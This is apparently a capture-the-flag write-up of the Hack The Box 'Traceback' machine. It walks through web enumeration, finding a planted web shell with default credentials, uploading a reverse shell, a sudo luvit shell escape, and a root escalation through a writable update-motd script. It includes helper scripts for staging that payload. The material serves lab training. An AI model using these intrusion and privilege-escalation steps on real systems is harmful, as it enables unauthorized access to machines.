Let's scan >>
dirb http://10.10.10.181/ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o /home/MrRobot/Documents/Documents/BoxesHACK/Traceback/resultsenum
Let's Google the Apache/Ubuntu version that nmap reported:
Apache httpd 2.4.29 ((Ubuntu))
Going back to something I noticed in the source of the main page, it is worth mentioning here:
there was a comment that gives a clue about what we are dealing with:
<!-- Some of the best web shells that you might need ;) -->
So we probably have to get into the website through a web shell,
or get a reverse connection with something similar.
Let's research this.
Let's postpone that and try gobuster instead of dirb with the same wordlist.
gobuster dir -u http://10.10.10.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401 -o /home/MrRobot/Documents/Documents/BoxesHACK/Traceback/enumerationweb.txt
3rd Step of the Process is
Exploitation and examining with different tools.
Let's start.
Nothing from ZAP.
Let's run Raccoon and see if we can get something...
raccoon 10.10.10.181
Wait for results...
Nothing.
I guess the standard steps don't work. Let's do some OSINT on the target and try to get something useful.
Looking at the main page's source again, we find something interesting:
by googling that sentence we land on a GitHub page listing web shell names. The first idea that came to mind was to make a wordlist of these web shell filenames and enumerate with gobuster.
https://github.com/TheBinitGhimire/Web-Shells
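The wordlist was built from the repository's filenames. The helper below is an added example, not part of the original writeup or of the linked repository: it assumes the repo has been cloned locally and turns every web shell file it contains into gobuster candidates (the filename as-is, the bare name for use with gobuster's -x php, and a lowercase variant, since the repo mixes case). The sample files in the test are constructed for illustration.

```shell
#!/bin/sh
# build_shell_wordlist DIR: print one gobuster candidate per line for every
# web shell file found under DIR (a local clone of a web-shell repository).
# For each file "Name.ext" it emits: Name.ext, Name, and name.ext (lowercased),
# then de-duplicates. .git internals are skipped.
build_shell_wordlist() {
  dir="$1"
  find "$dir" -type f ! -path '*/.git/*' \
       \( -name '*.php' -o -name '*.asp' -o -name '*.aspx' -o -name '*.jsp' \) \
    | while IFS= read -r f; do
        base=$(basename "$f")
        lower=$(printf '%s' "$base" | tr 'A-Z' 'a-z')
        printf '%s\n' "$base" "${base%.*}" "$lower"
      done | sort -u
}

# Usage (assumed paths, adjust to taste):
#   git clone https://github.com/TheBinitGhimire/Web-Shells /tmp/Web-Shells
#   build_shell_wordlist /tmp/Web-Shells > shells.txt
#   gobuster dir -u http://10.10.10.181/ -w shells.txt
```

Because the list is tiny compared with directory-list-2.3-medium.txt, this scan finishes in seconds, which is the whole point of building a target-specific wordlist from the hint.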
By running gobuster against this list, BINGO, we find the one URL that leads us to the target page:
smevk.php
The credentials are easy to guess: entering admin / admin
logs us in to the shell's main page.
After logging in it looks like we can upload files to the server, so I uploaded a reverse shell and got a connection back in meterpreter. BINGO, we got a shell:
First we start listening,
then upload the shell,
and execute it!
4th Step of the Penetration Session is
Privilege Escalation
By running sudo -l
we learn that we can run luvit as sysadmin without a password.
We are webadmin at this point; by running this command:
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
we escape luvit and spawn a shell as sysadmin.
WE GOT THE USER FLAG, LET'S MOVE ON >
Next, let's get root...
I grabbed pspy and placed it in /dev/shm to run it and watch the running processes.
Let's log in as sysadmin over SSH; that gives a much clearer picture of what we are dealing with here,
by following these steps:
on our box:
By running pspy we can see the processes and monitor them in real time.
A process that caught my attention is update-motd.
In /var/backups/update-motd we can read the files, but we can't edit them,
so I went to the live directory the scripts actually run from, /etc/update-motd.d, and BOOM, those copies are writable.
Let's edit the 00-header file:
Let's add cat /root/root.txt to it and see if it runs when we log in again.
We could do many other things at this point, but we'll stick to this way.
By logging in again over SSH we CAN get the root flag, boom!
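The escalation works because the MOTD scripts run as root on every login, so any script in /etc/update-motd.d that a lower-privileged user can write is a root code-execution path. The two helpers below are an added example, not from the writeup: the first is the check I would run on any Ubuntu box before looking further (list MOTD scripts that are group- or world-writable), the second stages a command into such a script exactly once. The directory, file names and permissions used in the test are constructed for illustration.

```shell
#!/bin/sh
# audit_motd [DIR]: print every file under DIR (default /etc/update-motd.d)
# that is writable by its group or by everyone. These scripts are executed
# as root when a user logs in, so each hit is a privilege-escalation path
# for anyone who can write to it. Ownership is deliberately not checked
# here; a root-owned file with mode 664 and a non-root group is the
# interesting case, and that is exactly what the write-bit test catches.
audit_motd() {
  dir="${1:-/etc/update-motd.d}"
  find "$dir" -type f \( -perm -g+w -o -perm -o+w \) 2>/dev/null | sort
}

# stage_motd_payload FILE CMD: append CMD as a new line to FILE, only if the
# current user can write FILE (returns 1 and touches nothing otherwise), and
# only if that exact line is not already present, so re-running is harmless.
stage_motd_payload() {
  file="$1"
  cmd="$2"
  [ -w "$file" ] || return 1
  grep -qxF -- "$cmd" "$file" && return 0
  printf '%s\n' "$cmd" >> "$file"
}

# Usage on the box, as the user you landed as after the luvit escape:
#   audit_motd                              # 00-header should be listed
#   stage_motd_payload /etc/update-motd.d/00-header 'cat /root/root.txt'
#   then log out and back in over SSH; the MOTD now prints the flag.
```

Defensively, the same check is the fix: MOTD scripts should be root:root and mode 755, and a backup copy somewhere like /var/backups is no protection if the live scripts are writable.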
Done.
What I learned from this box is that the foothold was a bit tricky to get: it needs a custom dictionary for enumeration, but it was hinted at, and all you need is a Google search, some creativity and quick observation.
Creating the shell was pretty easy, as was the foothold, but the privesc is more interesting: it involves an update-motd.d script that runs about 30 seconds after every reboot of the system, so after editing the header to cat /root/root.txt we could log out of SSH, log back in after 30 seconds, and see the flag on login.
That’s all for this writeup , See you in the NEXT ONES
Peace!
SoftAddict OUT